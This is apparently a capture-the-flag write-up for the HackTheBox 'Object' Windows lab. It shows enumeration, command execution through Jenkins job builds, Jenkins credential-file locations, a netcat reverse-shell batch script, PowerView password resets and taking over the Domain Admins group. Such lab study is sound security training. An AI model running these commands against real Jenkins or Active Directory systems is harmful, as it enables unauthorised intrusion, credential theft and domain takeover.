This machine gave me another opportunity to explore how applications such as Jenkins could be leveraged to compromise the system, the environment, and even a domain. In a nutshell, only the Jenkins documentation was needed along with a bit of research to gain access and PowerView to compromise the environment plus some Active Directory knowledge.
References
Enumeration
Service Enumeration
Just like every scenario, we need to get to know our target better. We do this enumeration by trying to find ports opened on the host and then enumerate each service.
Finding Open Ports:
┌──(kali 👿 kali)-[~/…/Object]
└─$ sudo nmap -e tun0 -Pn -sS -p- --min-rate=1000 --min-parallelism=100 -T5 object.htb -oA Object_OpenPorts
[sudo] password for kali:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-10 09:59 EDT
Nmap scan report for object.htb (10.129.96.147)
Host is up (0.11s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
5985/tcp open wsman
8080/tcp open http-proxy
Nmap done: 1 IP address (1 host up) scanned in 116.46 seconds
┌──(kali 👿 kali)-[~/…/Object]
└─$ sudo nmap -e tun0 -Pn -sS -sC -sV -p 80,5985,8080 --min-rate=1000 --min-parallelism=100 -T5 object.htb -oA Object_PortScan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-10 10:02 EDT
Nmap scan report for object.htb (10.129.96.147)
Host is up (0.12s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Mega Engines
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
8080/tcp open http Jetty 9.4.43.v20210629
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
|_http-server-header: Jetty(9.4.43.v20210629)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.31 seconds
[1] 519316 segmentation fault sudo nmap -e tun0 -Pn -sS -sC -sV -p 80,5985,8080 --min-rate=1000 -T5 -oA
HTTP (TCP 80) Enumeration:
While evaluating what's hosted on TCP 80, we find an email address (ideas@object.htb) which might have the domain used.
It also contains a hyperlink to the application hosted on TCP 8080; Jenkins.
HTTP (TCP 8080) Enumeration:
Registration page is enabled. So we go ahead and create our tester:test123 account.
In the users configuration page, we can create an API key: 192141ae5ce890dd441ab1338a0fe5e8f
This is required to basically trigger the jobs remotely.
As we dont have anything else here, we can create project but not build them:
“Use the following URL to trigger build remotely: JENKINS_URL/job/Testing/build?token=TOKEN_NAME or /buildWithParameters?token=TOKEN_NAME”
As our build steps to trigger, we will use 'whoami /all' for testing purposes:
To trigger the job, we used curl with the given URL sample:
┌──(kali 👿 kali)-[~/…/Object]
└─$ curl -vLkX GET --url 'http://object.htb:8080/job/Testing/build?token=tester' --user 'tester:1192141ae5ce890dd441ab1338a0fe5e8f'
Note: Unnecessary use of -X or --request, GET is already inferred.
* Trying 10.129.96.147:8080...
* Connected to object.htb (10.129.96.147) port 8080 (#0)
* Server auth using Basic with user 'tester'
> GET /job/Testing/build?token=tester HTTP/1.1
> Host: object.htb:8080
> Authorization: Basic dGVzdGVyOjExOTIxNDFhZTVjZTg5MGRkNDQxYWIxMzM4YTBmZTVlOGY=
> User-Agent: curl/7.85.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 201 Created
< Date: Mon, 10 Oct 2022 15:43:14 GMT
< X-Content-Type-Options: nosniff
< Location: http://object.htb:8080/queue/item/1/
< Content-Length: 0
< Server: Jetty(9.4.43.v20210629)
<
* Connection #0 to host object.htb left intact
Successful Trigger:
And its output:
Gaining Access
Given this finding where we can execute commands, we attempt to gain access by executing a PS reverse shell.
We tried to get creative like using powershell to pull a PS script with the same PS reverse shell payload but we only got a 'unable to connect to the remote server’ error. So at this point, we need to do some research.
Seems like Jenkins stores encrypted credentials locally and with NO admin access in the location set in the $JENKINS_HOME variable (typically the variable in a linux host). In this case, it would be in 'C:\Users\oliver\AppData\Local\Jenkins' as the error above gave us the path.
$JENKINS_HOME/credentials.xml: This files holds the encrypted credentials
$JENKINS_HOME/secrets/master.key: This file decrypts hudson.util.Secret
$JENKINS_HOME/secrets/hudson.util.Secret: This file decrypts credentials.xml entries and it is itself encrypted.
Through some job iterations we find that this directory has two directories that belong to the admin user and 'tester'. What we find is that instead of a credentials.xml file (I was expecting a file with this name), we find a config.xml file that contains the encrypted credentials as shown below:
After finding the flag, we need to retrieve more information from the domain, so we proceed to get users, and local and domain groups:
*Evil-WinRM* PS C:\Users\oliver\Desktop> net user /domain
User accounts for \\
-------------------------------------------------------------------------------
Administrator Guest krbtgt
maria oliver
The command completed with one or more errors.
*Evil-WinRM* PS C:\Users\oliver\Desktop> net user maria
User name maria
Full Name maria garcia
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 10/21/2021 9:16:32 PM
Password expires Never
Password changeable 10/22/2021 9:16:32 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 10/10/2022 6:56:45 AM
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.
*Evil-WinRM* PS C:\Users\oliver\Desktop> net user oliver
User name oliver
Full Name Olivar Ava
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 10/21/2021 2:23:12 AM
Password expires Never
Password changeable 10/22/2021 2:23:12 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 10/10/2022 6:56:48 AM
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.
*Evil-WinRM* PS C:\Users\oliver\Desktop> net group /domain
Group Accounts for \\
-------------------------------------------------------------------------------
*Cloneable Domain Controllers
*DnsUpdateProxy
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Key Admins
*Enterprise Read-only Domain Controllers
*Group Policy Creator Owners
*Key Admins
*Protected Users
*Read-only Domain Controllers
*Schema Admins
The command completed with one or more errors.
*Evil-WinRM* PS C:\Users\oliver\Desktop> net localgroup
Aliases for \\JENKINS
-------------------------------------------------------------------------------
*Access Control Assistance Operators
*Account Operators
*Administrators
*Allowed RODC Password Replication Group
*Backup Operators
*Cert Publishers
*Certificate Service DCOM Access
*Cryptographic Operators
*Denied RODC Password Replication Group
*Distributed COM Users
*DnsAdmins
*Event Log Readers
*Guests
*Hyper-V Administrators
*IIS_IUSRS
*Incoming Forest Trust Builders
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Pre-Windows 2000 Compatible Access
*Print Operators
*RAS and IAS Servers
*RDS Endpoint Servers
*RDS Management Servers
*RDS Remote Access Servers
*Remote Desktop Users
*Remote Management Users
*Replicator
*Server Operators
*Storage Replica Administrators
*Terminal Server License Servers
*Users
*Windows Authorization Access Group
The command completed successfully.
For further enumeration, we used Bloodhound:
*Evil-WinRM* PS C:\Users\oliver\Desktop> upload /opt/BloodHound/Ingestors/SharpHound.ps1
Info: Uploading /opt/BloodHound/Ingestors/SharpHound.ps1 to C:\Users\oliver\Desktop\SharpHound.ps1
Data: 1297900 bytes of 1297900 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\oliver\Desktop> Set-ExecutionPolicy Bypass -Scope CurrentUser;Import-Module .\SharpHound.ps1;Import-Module .\SharpHound.ps1
*Evil-WinRM* PS C:\Users\oliver\Desktop> Invoke-BloodHound -CollectAllProperties -CollectionMethod All
*Evil-WinRM* PS C:\Users\oliver\Desktop> ls
Directory: C:\Users\oliver\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/10/2022 10:36 AM 9139 20221010103651_BloodHound.zip
-a---- 10/10/2022 10:36 AM 10043 MWU2MmE0MDctMjBkZi00N2VjLTliOTMtYThjYTY4MjdhZDA2.bin
-a---- 10/10/2022 10:35 AM 973425 SharpHound.ps1
-ar--- 10/10/2022 6:56 AM 34 user.txt
From the users this domain has, only the domain local Administrator user is a member of the Domain Admins group and not through any other means.
From our enumeration with Bloodhound, we find the user smith which seems to be a protected user that oliver does not have access to see its information. But oliver has the ‘ForceChangePassword’ DACL against smith. This means "The user OLIVER@OBJECT.LOCAL has the capability to change the user SMITH@OBJECT.LOCAL's password without knowing that user's current password."
In turn, maria has ‘WriteOwner’ DACL against the Domain Admins group. This also means "The user MARIA@OBJECT.LOCAL has the ability to modify the owner of the group DOMAIN ADMINS@OBJECT.LOCAL. Object owners retain the ability to modify object security descriptors, regardless of permissions on the object's DACL."
Why all this is important? Well, "The user SMITH@OBJECT.LOCAL has generic write access to the user MARIA@OBJECT.LOCAL. Generic Write access grants you the ability to write to any non-protected attribute on the target object, including "members" for a group, and "serviceprincipalnames" for a user."
Validating the Remote Management Access rights to figure out which users is WinRM accessible to:
*Evil-WinRM* PS C:\Users\oliver\Desktop> net localgroup "Remote Management Users"
Alias name Remote Management Users
Comment Members of this group can access WMI resources over management protocols (such as WS-Management via the Windows Remote Management service). This applies only to WMI namespaces that grant access to the user.
Members
-------------------------------------------------------------------------------
maria
oliver
smith
The command completed successfully.
Account Modification
Modifying smith's password using PowerView:
*Evil-WinRM* PS C:\Users\oliver\Desktop> Import-Module .\PowerView.ps1
*Evil-WinRM* PS C:\Users\oliver\Desktop> $NewPassword = ConvertTo-SecureString 'test123' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\oliver\Desktop> Set-DomainUserPassword -Identity 'smith' -AccountPassword $NewPassword
Warning: [Set-DomainUserPassword] Error setting password for user 'smith' : Exception calling "SetPassword" with "1" argument(s): "The password does not meet the password policy requirements. Check the minimum password length, password complexity and password history requirements. (Exception from HRESULT: 0x800708C5)"
*Evil-WinRM* PS C:\Users\oliver\Desktop> $NewPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\oliver\Desktop> Set-DomainUserPassword -Identity 'smith' -AccountPassword $NewPassword
Testing modification:
┌──(kali 👿 kali)-[~/…/Object]
└─$ evil-winrm -i object.htb -u 'smith' -p 'Password123!'
Evil-WinRM shell v3.4
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\smith\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
============ ==============================================
object\smith S-1-5-21-4088429403-1159899800-2753317549-1104
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\smith\Documents>
Now that we have access as smith, we will use netcat through a batch script to get a reverse shell as maria.
Custom batch script:
@echo off
start /b C:\Windows\Temp\nc.exe 127.0.0.1 1337 -e cmd.exe
start /b "" cmd /c del "%~f0"&exit /b
In powershell, we will use PowerView to modify the account to execute this script:
As soon as we get a reverse shell thanks to this script, we can access all the files in maria's home directory, which contains an Excel spreadsheet with a list of passwords:
Testing maria's passwords and access:
To test these passwords, we will use crackmapexec:
*Evil-WinRM* PS C:\Users\maria\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
============ ==============================================
object\maria S-1-5-21-4088429403-1159899800-2753317549-1106
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\maria\Documents> upload /usr/share/windows-resources/powersploit/Recon/PowerView.ps1
Info: Uploading /usr/share/windows-resources/powersploit/Recon/PowerView.ps1 to C:\Users\maria\Documents\PowerView.ps1
Data: 1027036 bytes of 1027036 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\maria\Documents>
This does not say much of value but we already know maria can modify the group ownership of the Domain Admins group (dangerous!!).
Modifying Group Ownership
First, as we want to confirm this again, we will try and find any 'interesting DACLs':
Again with PowerView, we will change the ownership to maria to allow us to make add new ACLs:
*Evil-WinRM* PS C:\Users\maria\Documents> Set-DomainObjectOwner -Identity 'Domain Admins' -OwnerIdentity 'maria' -Verbose
Verbose: [Get-DomainSearcher] search base: LDAP://DC=object,DC=local
Verbose: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=maria)(name=maria)(displayname=maria))))
Verbose: [Get-DomainSearcher] search base: LDAP://DC=object,DC=local
Verbose: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=Domain Admins)(name=Domain Admins)(displayname=Domain Admins))))
Verbose: [Set-DomainObjectOwner] Attempting to set the owner for 'Domain Admins' to 'maria'
Now that maria is the owner, we can add a new ACL to gain full control of the group and add this account as a member of the 'Domain Admins' group, giving us Domain Administrator access:
*Evil-WinRM* PS C:\Users\maria\Documents> Add-DomainObjectAcl -TargetIdentity "Domain Admins" -PrincipalIdentity maria -Rights All
*Evil-WinRM* PS C:\Users\maria\Documents> Add-DomainGroupMember -Identity 'Domain Admins' -Members maria
*Evil-WinRM* PS C:\Users\maria\Documents> net group "Domain Admins" /domain
Group name Domain Admins
Comment Designated administrators of the domain
Members
-------------------------------------------------------------------------------
Administrator maria
The command completed successfully.
For this new access to take effect, we need to create a new session so we will access the system as maria once more and validate:
┌──(kali 👿 kali)-[~/…/Object]
└─$ evil-winrm -i object.htb -u 'maria' -p 'W3llcr4ft3d_4cls'
Evil-WinRM shell v3.4
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\maria\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
============ ==============================================
object\maria S-1-5-21-4088429403-1159899800-2753317549-1106
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
============================================= ================ ============================================= ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
OBJECT\Domain Admins Group S-1-5-21-4088429403-1159899800-2753317549-512 Mandatory group, Enabled by default, Enabled group
OBJECT\Denied RODC Password Replication Group Alias S-1-5-21-4088429403-1159899800-2753317549-572 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\maria\Documents> Get-ChildItem -Path C:\Users\Administrator\ -Recurse
Directory: C:\Users\Administrator
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 8/24/2021 7:51 AM 3D Objects
d-r--- 8/24/2021 7:51 AM Contacts
d-r--- 12/16/2021 9:11 AM Desktop
d-r--- 10/25/2021 8:40 PM Documents
d-r--- 10/22/2021 3:33 AM Downloads
d-r--- 8/24/2021 7:51 AM Favorites
d-r--- 8/24/2021 7:51 AM Links
d-r--- 8/24/2021 7:51 AM Music
d-r--- 8/24/2021 7:51 AM Pictures
d-r--- 8/24/2021 7:51 AM Saved Games
d-r--- 8/24/2021 7:51 AM Searches
d-r--- 8/24/2021 7:51 AM Videos
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 10/10/2022 6:56 AM 34 root.txt
Directory: C:\Users\Administrator\Favorites
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 8/24/2021 7:51 AM Links
-a---- 8/24/2021 7:51 AM 208 Bing.url
Directory: C:\Users\Administrator\Links
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 8/24/2021 7:51 AM 518 Desktop.lnk
-a---- 8/24/2021 7:51 AM 975 Downloads.lnk
As we can see, we now can access everything in the system including the contents of the Administrator's home directory. Let's continue and retrieve the root flag as if this was part of the OSCP (using ipconfig and type):
